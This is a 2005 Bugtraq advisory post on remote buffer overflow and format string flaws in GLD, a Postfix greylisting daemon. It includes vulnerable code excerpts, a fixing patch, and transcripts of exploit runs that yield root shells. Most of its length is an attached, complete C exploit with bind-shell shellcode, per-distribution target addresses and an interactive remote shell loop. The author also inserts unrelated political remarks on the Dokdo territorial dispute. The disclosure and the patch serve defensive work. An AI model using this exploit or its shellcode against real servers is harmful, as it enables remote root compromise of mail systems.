[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: GLD (Greylisting daemon for Postfix) multiple vulnerabilities.
From: "dong-hun you" <xploit () hackermail ! com>
Date: 2005-04-12 0:41:08
Message-ID: 20050412004111.562AC7A890E () ws4-4 ! us4 ! outblaze ! com
[Download RAW message or body]
========================================
INetCop Security Advisory #2005-0x82-026
========================================
Title: GLD (Greylisting daemon for Postfix) multiple vulnerabilities.
0x01. Description
About:
Gld is a standalone greylisting server for Postfix.
Greylisting is a new weapon to use against spam. For more information on
this technique, see http://www.greylisting.org.
This implementation listens on a TCP port and uses MySQL for storing data.
The server supports whitelists based on sender, sender domain and client IP.
It also supports light greylisting.
URL: http://www.gasmi.net/gld.html
Reference URL: http://www.gasmi.net/down/gld-readme
It's using in FreeBSD port and gentoo, debian.
Reference URL: http://wyae.de/docs/greylisting_on_debian.php
Reference URL: http://www.freebsd.org/cgi/cvsweb.cgi/ports/mail/gld/
Reference URL: http://gentoo-portage.com/mail-filter/gld
Reference URL: http://directory.fsf.org/email/spam/gld.html
The program has plenty of remote vulnerabilities.
These vulnerabilities can be used remote user to gain root privilege.
#1) Multi-oveflow vulnerability
This problem happens because of abuse of strcpy() and sprintf() functions
`/gid-1.4/server.c':
--
...
195 int HandleChild(int s,config *cnf)
196 {
197 char buff[BLEN];
198 char request[BLEN];
199 char sender[BLEN];
200 char recipient[BLEN];
201 char ip[BLEN];
...
301 if(strcmp(request,REQ)!=0 || recipient[0]==0 || ip[0]==0)
302 {
303 sprintf(buff,"Received invalid data req=(%s) sender=(%s) \
recipient=(%s) ip=(%s)",request,sender,recipient,ip); // here 304 \
if(cnf->syslog==1) ErrorLog(cnf,buff); 305 if(cnf->debug==1) printf("%d: \
%s\n",pid,buff); 306 return(-2);
307 }
...
--
Remote overflow exploit can be happened by sprintf() and it allows attacker to gain \
root privilege.
#2) remote format string -
These vulnerabilities are very easy to be exploited.
gld.conf is supporting syslog() function basically.
Thereby, with problem in next code, it's possible to gain root privilege.
`/gld-1.4/cnf.c':
--
...
117 void ErrorLog(config *conf,char *msg)
118 {
119 #ifdef HAVE_SYSLOG_H
120 openlog("gld",0,conf->facility);
121 syslog(LOG_ALERT,msg); // here
122 closelog();
123 #endif
124 }
...
--
It happens by illegal use of syslog() function.
--
bash-2.04# cat *.c |grep ErrorLog |grep -v void
if(conf.syslog==1) ErrorLog(&conf,"gld started, up and running");
if(cid < 0 && conf.syslog==1) ErrorLog(&conf,"Fork returned error \
code, no child"); ErrorLog(cnf,buff);
if(cnf->syslog==1) ErrorLog(cnf,"Read Network error");
if(cnf->syslog==1) ErrorLog(cnf,buff);
if(cnf->syslog==1) ErrorLog(cnf,"MySQL error");
bash-2.04#
--
It can be exploited pretty easily.
And there are alot more sprintf(), strcpy() function overflow vulnerabilities which \
are not mentioned.
0x02. Vulnerable Packages
Vendor site: http://www.gasmi.net/gld.html
GLD all version (exploitable)
-gld-1.4.tgz
-gld.1.3.tgz
0x03. Exploit
I made this exploit in RedHat Linux 7.x and 9.x by Proof of Concept code.
There is no plan to develop other platform code.
#1) remote buffer overflow exploit:
bash-2.04$ ./0x82-meOw_linuxer_forever -t 3 -h x0x
#
# 0x82-meOw_linuxer_forever - Greylisting daemon for Postfix remote exploit
# szoahc(at)hotmail(dot)com
#
#
# target host: x0x:2525
# type: Red Hat Linux release 9 (Shrike) gld 1.4 (buffer overflow exploit)
# method: jmp *%esp exploit: 254 byte
# send code size: 2200 byte
#
# Waiting rootshell, Trying x0x:36864 ...
# connected to x0x:36864 !
#
#
# Kill two bird with one stone!
# OK, It's Rootshell
#
Linux x0x 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) \
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) bash: no job control \
in this shell stty: standard input: Invalid argument
[root@x0x /]# w
#2) remote format string exploit:
bash-2.04$ ./0x82-meOw_linuxer_forever -t 0 -h x0x
#
# 0x82-meOw_linuxer_forever - Greylisting daemon for Postfix remote exploit
# szoahc(at)hotmail(dot)com
#
#
# target host: x0x:2525
# type: Red Hat Linux release 9 (Shrike) gld 1.4 (format string exploit)
# Make format string, .dtors: 0x804d14c
#
# shellcode addr: 0x805506e, size: 320 byte
# send code size: 394 byte
#
# Waiting rootshell, Trying x0x:36864 ...
# connected to x0x:36864 !
#
#
# Kill two bird with one stone!
# OK, It's Rootshell
#
Linux x0x 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 i686 i386 GNU/Linux
uid=0(root) gid=0(root) \
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) bash: no job control \
in this shell stty: standard input: Invalid argument
[root@x0x /]#
0x04. Patch
GLD 1.4 patch:
=== gld-1.4.patch ===
--- cnf.c 2004-08-18 23:44:22.000000000 +0900
+++ patch/cnf.c 2005-03-06 17:36:04.000000000 +0900
@@ -118,7 +118,7 @@
{
#ifdef HAVE_SYSLOG_H
openlog("gld",0,conf->facility);
-syslog(LOG_ALERT,msg);
+syslog(LOG_ALERT,"%s",msg);
closelog();
#endif
}
--- greylist.c 2004-08-18 04:12:38.000000000 +0900
+++ patch/greylist.c 2005-03-06 17:39:59.000000000 +0900
@@ -20,9 +20,9 @@
pid=getpid();
ts=time(0);
-strcpy(oip,ip);
-strcpy(osender,sender);
-strcpy(orecipient,recipient);
+strncpy(oip,ip,sizeof(oip)-1);
+strncpy(osender,sender,sizeof(osender)-1);
+strncpy(orecipient,recipient,sizeof(orecipient)-1);
if(conf->debug==1) printf("%d: Starting the greylist algo\n",pid);
@@ -52,17 +52,17 @@
if(conf->debug==1) printf("%d: lightgrey on domain is on, let's keep the \
domain only on recipient and sender\n",pid);
domain=(char *)strstr(osender,"@");
- if(domain!=NULL) strcpy(sender,domain);
+ if(domain!=NULL) strncpy(sender,domain,BLEN-1);
domain=(char *)strstr(orecipient,"@");
- if(domain!=NULL) strcpy(recipient,domain);
+ if(domain!=NULL) strncpy(recipient,domain,BLEN-1);
}
//
// Do we have this entry in our database ?
//
-sprintf(query,"select first from greylist where ip='%s' and sender='%s' and \
recipient='%s'",ip,sender,recipient); +snprintf(query,sizeof(query)-1,"select first \
from greylist where ip='%s' and sender='%s' and recipient='%s'",ip,sender,recipient); \
n=SQLQuery(query);
if(conf->debug==1) printf("%d: Query=(%s) result=%ld\n",pid,query,n);
@@ -78,7 +78,7 @@
//
if(conf->lightd==1 && n==0)
{
- sprintf(query,"select first from greylist where ip='%s' and sender='%s' and \
recipient='%s'",ip,osender,orecipient); + \
snprintf(query,sizeof(query)-1,"select first from greylist where ip='%s' and \
sender='%s' and recipient='%s'",ip,osender,orecipient); n=SQLQuery(query);
if(n<0) return(-1);
if(n==0) fneither=1; else fnotdomain=1;
@@ -101,7 +101,7 @@
domain=(char *)strstr(osender,"@");
if(domain==NULL) domain=osender;
- strcpy(netw,oip);
+ strncpy(netw,oip,sizeof(netw)-1);
l=strlen(netw);
for(i=l-1;i>=0;i--)
if(netw[i]=='.')
@@ -111,7 +111,7 @@
}
- sprintf(query,"select count(mail) from whitelist where mail in \
('%s','%s','%s','%s')",osender,domain,oip,netw); + \
snprintf(query,sizeof(query)-1,"select count(mail) from whitelist where mail in \
('%s','%s','%s','%s')",osender,domain,oip,netw); n=SQLQuery(query);
if(conf->debug==1) printf("%d: Query=(%s) result=%ld\n",pid,query,n);
if(n>0)
@@ -130,7 +130,7 @@
x=sscanf(oip,"%d.%d.%d.%d",&a,&b,&c,&d);
if(x==4)
{
- sprintf(query,"%d.%d.%d.%d.%s",d,c,b,a,conf->dnswl);
+ snprintf(query,sizeof(query)-1,"%d.%d.%d.%d.%s",d,c,b,a,conf->dnswl);
n=DnsIp(query,NULL);
if(conf->debug==1) printf("%d: DNSQuery=(%s) result=%ld\n",pid,query,n);
if(n==0)
@@ -146,9 +146,9 @@
// was not whitelisted and thus we have to insert it
//
if(conf->lightd==1 && fneither==1)
- sprintf(query,"insert into greylist \
values('%s','%s','%s',%d,%d,1)",ip,osender,orecipient,ts,ts); + \
snprintf(query,sizeof(query)-1,"insert into greylist \
values('%s','%s','%s',%d,%d,1)",ip,osender,orecipient,ts,ts);
- else sprintf(query,"insert into greylist \
values('%s','%s','%s',%d,%d,1)",ip,sender,recipient,ts,ts); + else \
snprintf(query,sizeof(query)-1,"insert into greylist \
values('%s','%s','%s',%d,%d,1)",ip,sender,recipient,ts,ts);
SQLQuery(query);
if(conf->debug==1) printf("%d: Query=(%s)\n",pid,query);
@@ -165,9 +165,9 @@
if(conf->update==1)
{
if(conf->lightd==1 && fnotdomain==1)
- sprintf(query,"update greylist set last=%d,n=n+1 where ip='%s' and \
sender='%s' and recipient='%s'",ts,ip,osender,orecipient); + \
snprintf(query,sizeof(query)-1,"update greylist set last=%d,n=n+1 where ip='%s' and \
sender='%s' and recipient='%s'",ts,ip,osender,orecipient);
- else sprintf(query,"update greylist set last=%d,n=n+1 where ip='%s' and \
sender='%s' and recipient='%s'",ts,ip,sender,recipient); + else \
snprintf(query,sizeof(query)-1,"update greylist set last=%d,n=n+1 where ip='%s' and \
sender='%s' and recipient='%s'",ts,ip,sender,recipient);
SQLQuery(query);
if(conf->debug==1) printf("%d: Query=(%s)\n",pid,query);
@@ -180,7 +180,7 @@
if(ts-n>conf->mini && conf->lightd==1 && fnotdomain==1)
{
- sprintf(query,"insert into greylist \
values('%s','%s','%s',%d,%d,1)",ip,sender,recipient,ts,ts); \
+ snprintf(query,sizeof(query)-1,"insert into greylist \
values('%s','%s','%s',%d,%d,1)",ip,sender,recipient,ts,ts); if(conf->debug==1) \
printf("Add the domain triplet for next time.\n"); SQLQuery(query);
}
--- server.c 2004-08-19 07:57:03.000000000 +0900
+++ patch/server.c 2005-03-06 17:41:52.000000000 +0900
@@ -215,7 +215,7 @@
if(cnf->debug==1) printf("%d: Rejected New incoming connexion from %s \
(%s)\n",pid,buff,ip); if(cnf->syslog==1)
{
- sprintf(buff,"Rejected New incoming connexion from %s (%s)\n",buff,ip);
+ snprintf(buff,sizeof(buff)-1,"Rejected New incoming connexion from %s \
(%s)\n",buff,ip); ErrorLog(cnf,buff);
}
@@ -262,16 +262,16 @@
if(strcmp(buff,"")==0) break;
if(strncmp(buff,"request=",8)==0)
- strcpy(request,buff+8);
+ strncpy(request,buff+8,sizeof(request)-1);
if(strncmp(buff,"sender=",7)==0)
- strcpy(sender,buff+7);
+ strncpy(sender,buff+7,sizeof(sender)-1);
if(strncmp(buff,"recipient=",10)==0)
- strcpy(recipient,buff+10);
+ strncpy(recipient,buff+10,sizeof(recipient)-1);
if(strncmp(buff,"client_address=",15)==0)
- strcpy(ip,buff+15);
+ strncpy(ip,buff+15,sizeof(ip)-1);
}
@@ -300,7 +300,7 @@
if(strcmp(request,REQ)!=0 || recipient[0]==0 || ip[0]==0)
{
- sprintf(buff,"Received invalid data req=(%s) sender=(%s) recipient=(%s) \
ip=(%s)",request,sender,recipient,ip); + snprintf(buff,sizeof(buff)-1,"Received \
invalid data req=(%s) sender=(%s) recipient=(%s) \
ip=(%s)",request,sender,recipient,ip); if(cnf->syslog==1) ErrorLog(cnf,buff);
if(cnf->debug==1) printf("%d: %s\n",pid,buff);
return(-2);
@@ -322,7 +322,7 @@
if(n==0)
{
- sprintf(buff,"action=defer_if_permit %s\n\n",cnf->message);
+ snprintf(buff,sizeof(buff)-1,"action=defer_if_permit %s\n\n",cnf->message);
WriteSocket(s,buff,strlen(buff),TOUT);
if(cnf->syslog==1) Log(cnf,recipient,sender,ip,MSGGREYLIST);
if(cnf->debug==1) printf("%d: Decision is to greylist\n",pid);
=== eof ===
P.S: Sorry, for my poor english.
--
These days, the main issue that strikes Korea is small rocky island "Dokdo".
You can get more detailed information from following websites.
"Japanese goverment has to follow and learn from German goverment"
I can confidently say "Dokdo is belong to Korea".
(1) reference
1) Their claim that the East Sea has some historical precedent worked,
as some major book and map publishers, educational web sites and other
reference materials now include the East Sea name along with the Sea of Japan.
- worldatlas.com-
http://www.worldatlas.com/webimage/countrys/asia/eastsea.htm
2) On historical perspective and in international law, why there
is no valid dispute over the ownership of Dokdo.
http://www.prkorea.com/english/textbook/ge03.html
3) Truth in scholarship
http://www.prkorea.com/english/textbook/maintruth.html
--
By "dong-houn yoU" (Xpl017Elz), in INetCop Security Co., LTD.
MSN & E-mail: szoahc(at)hotmail(dot)com,
xploit(at)hackermail(dot)com
INetCop Security Home: http://www.inetcop.net
My World: http://x82.inetcop.org
GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
--
--
_______________________________________________
Get your free email from http://www.hackermail.com
Powered by Outblaze
["0x82-meOw_linuxer_forever.c" (application/octet-stream)]
/*
**
**
** 0x82-meOw-linuxer_forever - gld 1.4 remote overflow format string exploit.
** (c) 2005 Team INetCop Security.
**
** Nickname of this code is,
** `Kill two bird with one stone.' or, `One shot, two kill!.'
** hehehe ;-D
**
** Advisory URL: http://x82.inetcop.org/h0me/adv1sor1es/INCSA.2005-0x82-026-GLD.txt
**
** It's as well as RedHat Linux and to gentoo, debian Linux, *BSD.
** You can develop for your flatform.
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.inetcop.org
**
**
** P.S: My domain x82.i21c.net encountered compulsion withdrawal from the country.
** They are killing many hackers of the Korea. hehehe ;-p
**
*/
/*
**
** These days, the main issue that strikes Korea is small rocky island "Dokdo".
** You can get more detailed information from following websites.
**
** "Japanese goverment has to follow and learn from German goverment"
**
** I can confidently say "Dokdo is belong to Korea".
**
** (1) reference
**
** 1) Their claim that the East Sea has some historical precedent worked,
** as some major book and map publishers, educational web sites and other
** reference materials now include the East Sea name along with the Sea of Japan.
** - worldatlas.com-
**
** http://www.worldatlas.com/webimage/countrys/asia/eastsea.htm
**
** 2) On historical perspective and in international law, why there
** is no valid dispute over the ownership of Dokdo.
**
** http://www.prkorea.com/english/textbook/ge03.html
**
** 3)Truth in scholarship
**
** http://www.prkorea.com/english/textbook/maintruth.html
**
**
*/
#include <stdio.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#define DEF_HOST "localhost"
#define PORT 2525
struct os_t {
int number;
char *os_type;
unsigned long dtors_addr;
unsigned long shell;
int sflag;
};
struct os_t platform[]={
{
0,"Red Hat Linux release 7.0 (Guinness) gld 1.4 (format string exploit)",
0x0804db98,0xbfffa3bc,15
},
{
1,"Red Hat Linux release 9 (Shrike) gld 1.4 (format string exploit)",
0x0804d14c,0x0805506e,15
},
{
2,"Red Hat Linux release 7.0 (Guinness) gld 1.4 (buffer overflow exploit)",
0,0xbfffa5d8,300
},
{
/* jmp *%esp method */
3,"Red Hat Linux release 9 (Shrike) gld 1.4 (buffer overflow exploit)",
0,0x4212c5eb,254
},
{
4,NULL,0,0,0
}
};
int __debug_chk=0;
char t_atk[0xfff*3];
// This is lovable shellcode, that's sweet in linux platform.
char shellcode[]= /* portshell shellcode, 128 bytes (tcp/36864) */
"\xeb\x72\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\x43\xc6\x46\x10\x10\x66\x89"
"\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89\x46\x18\xb0\x90\x66\x89"
"\x46\x16\x8d\x4e\x14\x89\x4e\x0c\x8d\x4e\x08\xb0\x66\xcd\x80\x89"
"\x5e\x0c\x43\x43\xb0\x66\xcd\x80\x89\x56\x0c\x89\x56\x10\xb0\x66"
"\x43\xcd\x80\x86\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0\x3f\x41\xcd\x80"
"\xb0\x3f\x41\xcd\x80\x88\x56\x07\x89\x76\x0c\x87\xf3\x8d\x4b\x0c"
"\xb0\x0b\xcd\x80\xe8\x89\xff\xff\xff/bin/sh";
void banrl();
int make_bof_code(unsigned long shell,int size,int type);
int make_fmt_code(unsigned long retloc,unsigned long shell,int sflag);
int setsock(char *host,int port);
void usage(char *args);
void re_connt(int sock);
void conn_shell(int sock);
int main(int argc,char *argv[])
{
int sock,type=0;
int port=(PORT);
char host[256]=DEF_HOST;
int sflag=platform[type].sflag;
unsigned long retloc=platform[type].dtors_addr;
unsigned long shell=platform[type].shell;
(void)banrl();
while((sock=getopt(argc,argv,"DdF:f:R:r:S:s:H:h:T:t:Ii"))!=EOF) {
extern char *optarg;
switch(sock) {
case 'D':
case 'd':
__debug_chk=1;
break;
case 'R':
case 'r':
retloc=strtoul(optarg,NULL,0);
break;
case 'S':
case 's':
shell=strtoul(optarg,NULL,0);
break;
case 'F':
case 'f':
sflag=atoi(optarg);
break;
case 'H':
case 'h':
memset((char *)host,0,sizeof(host));
strncpy(host,optarg,sizeof(host)-1);
break;
case 'T':
case 't':
type=atoi(optarg);
if(type>=4){
(void)usage(argv[0]);
} else {
retloc=platform[type].dtors_addr;
shell=platform[type].shell;
sflag=platform[type].sflag;
}
break;
case 'I':
case 'i':
(void)usage(argv[0]);
break;
case '?':
fprintf(stderr,"Try `%s -i' for more information.\n\n",argv[0]);
exit(-1);
break;
}
}
fprintf(stdout," #\n # target host: %s:%d\n",host,port);
fprintf(stdout," # type: %s\n",platform[type].os_type);
switch(type)
{
case 0:
case 1:
(int)make_fmt_code(retloc,shell,sflag);
break;
case 2:
(int)make_bof_code(shell,sflag,0);
break;
case 3:
(int)make_bof_code(shell,sflag,1);
}
fprintf(stdout," # send code size: %d byte\n",strlen(t_atk));
sock=setsock(host,port);
(void)re_connt(sock);
if(__debug_chk) sleep(10);
send(sock,t_atk,strlen(t_atk),0);
close(sock);
fprintf(stdout," #\n # Waiting rootshell, Trying %s:36864 ...\n",host);
sleep(1);
sock=setsock(host,36864);
(void)re_connt(sock);
fprintf(stdout," # connected to %s:36864 !\n #\n\n",host);
(void)conn_shell(sock);
}
int make_bof_code(unsigned long shell,int size,int type)
{
int a,b;
char nop_shell[8192];
char code_buf[4096];
memset((char *)nop_shell,0,sizeof(nop_shell));
memset((char *)code_buf,0,sizeof(code_buf));
memset((char *)t_atk,0,sizeof(t_atk));
switch(type)
{
case 0:
fprintf(stdout," # method: normal overflow exploit: %d byte\n",size);
/* sender buffer = nop, shellcode */
for(a=0;a<1000-strlen(shellcode);a++)
nop_shell[a]='N';
for(b=0;b<strlen(shellcode);b++)
nop_shell[a++]=shellcode[b];
/* client_address = retaddr */
for(b=0;b<size*4;b+=4)
*(long *)&code_buf[b]=shell;
snprintf(t_atk,sizeof(t_atk)-1,
"sender=%s\r\n"
"client_address=%s\r\n\r\n",nop_shell,code_buf);
break;
case 1:
fprintf(stdout," # method: jmp *%%esp exploit: %d byte\n",size);
/* sender buffer */
for(a=0;a<1000;a++)
nop_shell[a]='N';
/* client_address buffer */
for(b=0;b<size*4;b+=4)
*(long *)&code_buf[b]=0x82828282;
/* ebp */
*(long *)&code_buf[b]=0x41414141;
b+=4;
/* eip (jmp *%esp) */
*(long *)&code_buf[b]=(shell);
b+=4;
/* jmp nop (0xeb,0x08) */
*(long *)&code_buf[b]=0x08eb08eb;
b+=4;
/* dummy, nop */
// 0x0804d280 0xbfffe1c8 0x08049521
*(long *)&code_buf[b]=0x0804d280;
b+=4;
*(long *)&code_buf[b]=0x90909090;//0xbfffe1c8;
b+=4;
*(long *)&code_buf[b]=0x90909090;//0x08049521;
b+=4;
*(long *)&code_buf[b]=0x90909090;
b+=4;
/* shellcode */
for(a=0;a<strlen(shellcode);a++)
code_buf[b++]=shellcode[a];
snprintf(t_atk,sizeof(t_atk)-1,
"sender=%s\r\n"
"client_address=%s\r\n\r\n",nop_shell,code_buf);
}
}
int make_fmt_code(unsigned long retloc,unsigned long shell,int sflag)
{
unsigned char header[256];
unsigned char nop_shell[8192];
int a,b,c,d,e,f;
int addr1,addr2,addr3,addr4;
a=b=c=d=e=f=addr1=addr2=addr3=addr4=0;
memset((char *)header,0,sizeof(header));
memset((char *)nop_shell,0,sizeof(nop_shell));
memset((char *)t_atk,0,sizeof(t_atk));
fprintf(stdout," # Make format string, .dtors: %p\n",retloc);
*(long *)&header[0]=retloc+0;
*(long *)&header[4]=retloc+1;
*(long *)&header[8]=retloc+2;
*(long *)&header[12]=retloc+3;
a=(shell>>24)&0xff;
addr1=(shell>>24)&0xff;
b=(shell>>16)&0xff;
addr2=(shell>>16)&0xff;
c=(shell>>8)&0xff;
addr3=(shell>>8)&0xff;
d=(shell>>0)&0xff;
addr4=(shell>>0)&0xff;
if((addr4-16-65)<10)d+=0x100;
if((addr3-addr4)<10)c+=0x100;
if((addr2-addr3)<10)b+=0x100;
for(e=0;e<320-strlen(shellcode);e++)
nop_shell[e]='N';
for(f=0;f<strlen(shellcode);f++)
nop_shell[e++]=shellcode[f];
fprintf(stdout," #\n # shellcode addr: %p, size: %d byte\n",shell,strlen(nop_shell));
snprintf(t_atk,sizeof(t_atk)-1,
"client_address=%s" /* header */
"%%%ux%%%d$n%%%ux%%%d$n%%%ux%%%d$n%%%ux%%%d$n" /* fmt code */
"%s\r\n\r\n", /* shellcode */
header,d-16-65,(sflag+0),c-addr4,(sflag+1),b-addr3,
(sflag+2),0x100+a-addr2,(sflag+3),nop_shell);
}
void re_connt(int sock)
{
if(sock==-1)
{
fprintf(stdout," #\n # Failed.\n");
fprintf(stdout," # Happy Exploit ! :-)\n #\n\n");
exit(-1);
}
}
int setsock(char *host,int port)
{
int sock;
struct hostent *he;
struct sockaddr_in x82_addr;
if((he=gethostbyname(host))==NULL)
{
herror(" # gethostbyname() error");
return(-1);
}
if((sock=socket(AF_INET,SOCK_STREAM,0))==EOF)
{
perror(" # socket() error");
return(-1);
}
x82_addr.sin_family=AF_INET;
x82_addr.sin_port=htons(port);
x82_addr.sin_addr=*((struct in_addr *)he->h_addr);
bzero(&(x82_addr.sin_zero),8);
if(connect(sock,(struct sockaddr *)&x82_addr,sizeof(struct sockaddr))==EOF)
{
perror(" # connect() error");
return(-1);
}
return(sock);
}
void conn_shell(int sock)
{
int pckt;
char *cmd="uname -a;id;export TERM=vt100;exec bash -i\n";
char rbuf[1024];
fd_set rset;
memset((char *)rbuf,0,1024);
fprintf(stdout," #\n # Kill two bird with one stone!\n");
fprintf(stdout," # OK, It's Rootshell\n #\n\n");
send(sock,cmd,strlen(cmd),0);
while(1)
{
fflush(stdout);
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock+1,&rset,NULL,NULL,NULL);
if(FD_ISSET(sock,&rset))
{
pckt=read(sock,rbuf,1024);
if(pckt<=0)
{
fprintf(stdout," #\n # Happy Exploit !\n #\n\n");
exit(0);
}
rbuf[pckt]=0;
printf("%s",rbuf);
}
if(FD_ISSET(STDIN_FILENO,&rset))
{
pckt=read(STDIN_FILENO,rbuf,1024);
if(pckt>0)
{
rbuf[pckt]=0;
write(sock,rbuf,pckt);
}
}
}
return;
}
void banrl()
{
fprintf(stdout,"\n #\n # 0x82-meOw_linuxer_forever - Greylisting daemon for Postfix remote exploit\n");
fprintf(stdout," # szoahc(at)hotmail(dot)com\n #\n\n");
}
void usage(char *args)
{
int i;
fprintf(stdout," Usage: %s -options arguments\n\n",args);
fprintf(stdout,"\t-r [retloc] - .dtors address.\n");
fprintf(stdout,"\t-s [shell] - shellcode address.\n");
fprintf(stdout,"\t-f [flag num] - $-flag count.\n");
fprintf(stdout,"\t-h [host] - target hostname.\n");
fprintf(stdout,"\t-t [type num] - target number.\n");
fprintf(stdout,"\t-i - help information.\n\n");
fprintf(stdout," - Target Type Number List -\n\n");
for(i=0;platform[i].os_type!=NULL;i++)
{
fprintf(stdout," {%d} : %s\n",i,platform[i].os_type);
}
fprintf(stdout,"\n Example: %s -t 0 -h localhost\n",args);
fprintf(stdout," Example: %s -r 0x82828282 -s 0x82828282 -f 15\n\n",args);
exit(0);
}
/* eox */
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic